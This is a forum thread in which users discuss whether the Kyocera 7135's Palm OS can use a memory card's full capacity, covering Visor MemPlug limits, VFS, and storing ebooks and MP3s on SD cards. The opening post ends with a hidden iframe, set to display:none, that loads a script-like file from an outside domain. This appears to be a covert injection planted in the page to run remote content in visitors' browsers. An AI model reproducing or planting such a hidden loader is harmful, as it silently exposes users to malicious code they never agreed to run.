+ Reply to Thread

All of Card Memory Available to 7135 OS

Memory Card vs Available Memory

Is the full card capacity of a memory card available to the OS all at once, or is divided into blocks by the phone/device?

On my Handspring Visor Deluxe, I can access a 16 MB memory card in addition to the 8 MB on board, but a 64 MB card is not fully available. It must be transferred in to the system on a space available basis; i.e., a large program (like a reference book) cannot be accessed without swapping it with another program.

I want to put large ebooks on the card and be able to read them without having to swap them in and out of memory.

Can the 7135 access the entire capacity of the card? Will I be able to do what I want?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

poked back in
    On my Visor Platinum I have an 8MB onboard and a 64MB Smart Media Card in my MemPlug. It addresses it fine with VFS.

I've got the MemPlug, too, but I can't address all 64 MB at once. What is VFS?

VFS is Virtual File System, which supports expansion cards. I don't know the specifics, but from what others on the board have said about it, I would expect that the 7135 would be able to read a 16+MB ebook from the card without trouble. I would support this assertion by the fact that people can watch movies off of their SD cards using the 7135, which are certainly more than 16MB in size. The way VFS has been explained to me is that it lets the Palm treat the expansion card like it was more RAM. Alanb or Hotsync should be able to answer this more definitively than I can, though.
    ---------------
    The same thing we do every night, Pinky...

For clarification, This would only affect large files (I can use the whoel (ie 256mb) card for MP3's fine?
    Walt

Originally posted by wareynolds
    For clarification, This would only affect large files (I can use the whoel (ie 256mb) card for MP3's fine?
    Yup. I have about 240MB of mp3's on my SD card with no problems.
    ---------------
    The same thing we do every night, Pinky...